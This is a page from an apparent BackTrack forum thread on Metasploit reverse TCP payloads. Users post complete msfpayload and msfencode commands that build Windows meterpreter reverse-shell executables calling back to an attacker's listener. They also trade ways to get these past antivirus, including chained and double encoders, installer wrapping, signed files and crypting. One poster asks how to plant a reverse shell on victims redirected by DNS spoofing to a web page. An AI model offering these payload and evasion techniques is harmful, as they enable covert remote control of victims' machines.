Page 8 of 9 FirstFirst ... 6789 LastLast
Results 71 to 80 of 90

Thread: Metasploiting for BT3 - Reverse TCP

  1. #71
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    11

    Default meterpreter, via html page

    I remember seeing an article on injecting a reverse shell via html, after having spoofed the dns and redirecting the victim to my page, but i cannot find the article, does anyone know any information on this area.

    Or know any techniques that can get a reverse shell after a web page is visited.

    cheers

  2. #72
    Junior Member
    Join Date
    Sep 2006
    Posts
    45

    Default

    Quote Originally Posted by kazalku View Post
    Well, seems that the AV is getting smarter.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    Yours is getting caught?
    I think i either did
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    or

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe >> output.exe


    You could always try stopping the service whilst you create it then do some magical mystical asm XOR'ing in the right places.

    Thanks for the heads up tho.

    //strange, i've just updated my def's and scanned it. Mine's not getting caught at scantime OR runtime.
    I'll give it a few days then start panicing

  3. #73
    Junior Member
    Join Date
    Apr 2009
    Posts
    33

    Default

    Quote Originally Posted by kazalku View Post
    Well, seems that the AV is getting smarter.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    I have been running into this with avast as well, tried every trick I could think of but no luck. Anyone found a way around this?

  4. #74
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by rmills View Post
    I have been running into this with avast as well, tried every trick I could think of but no luck. Anyone found a way around this?
    Every trick included a different encoder or double encoding right?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #75
    Junior Member
    Join Date
    Apr 2009
    Posts
    33

    Default

    Quote Originally Posted by Gitsnik View Post
    Every trick included a different encoder or double encoding right?
    I dont know the encoder really well but I tried the ideas I knew, a few combos of x86/fnstenv_mov, x86/jmp_call_additive and the standard x86/shikata_ga_nai. Both single and double encoding. I dont know the syntax for the manual encoders like x86/unicode_upper, maybe that would do it? Counts don't seem to matter. Also tried the basic iexpress and nullsoft with some different combo using signed files but when avast on-access scans it, game over. If you know the flags for the manual options please post.

    I could also be doing the double encoding wrong, I am using it like...

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX EXITFUNC=thread R | ./msfencode -e x86/fnstenv_mov -b '\x00\xff' -t raw | ./msfencode -b '' -t exe -o /tmp/payload.exe

  6. #76
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by aliosity View Post
    Yours is getting caught?
    I think i either did
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    or

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe >> output.exe


    You could always try stopping the service whilst you create it then do some magical mystical asm XOR'ing in the right places.

    Thanks for the heads up tho.

    //strange, i've just updated my def's and scanned it. Mine's not getting caught at scantime OR runtime.
    I'll give it a few days then start panicing
    Both getting cought...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  7. #77
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by rmills View Post
    I dont know the encoder really well but I tried the ideas I knew, a few combos of x86/fnstenv_mov, x86/jmp_call_additive and the standard x86/shikata_ga_nai. Both single and double encoding. I dont know the syntax for the manual encoders like x86/unicode_upper, maybe that would do it? Counts don't seem to matter. Also tried the basic iexpress and nullsoft with some different combo using signed files but when avast on-access scans it, game over. If you know the flags for the manual options please post.

    I could also be doing the double encoding wrong, I am using it like...

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX EXITFUNC=thread R | ./msfencode -e x86/fnstenv_mov -b '\x00\xff' -t raw | ./msfencode -b '' -t exe -o /tmp/payload.exe
    This one as well....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #78
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    First of all you dont need to triple pipe it like that, there is support in msfencode for multiple encoding, you might also want to try restricting more characters ... other than that, your best bet is to output it then crypt it with something else.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  9. #79
    Junior Member
    Join Date
    Apr 2009
    Posts
    33

    Default

    Quote Originally Posted by vvpalin View Post
    First of all you dont need to triple pipe it like that, there is support in msfencode for multiple encoding, you might also want to try restricting more characters ... other than that, your best bet is to output it then crypt it with something else.
    Can you give an example of something else you might encrypt it with?

  10. #80
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Quote Originally Posted by rmills View Post
    Can you give an example of something else you might encrypt it with?
    Google
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Page 8 of 9 FirstFirst ... 6789 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •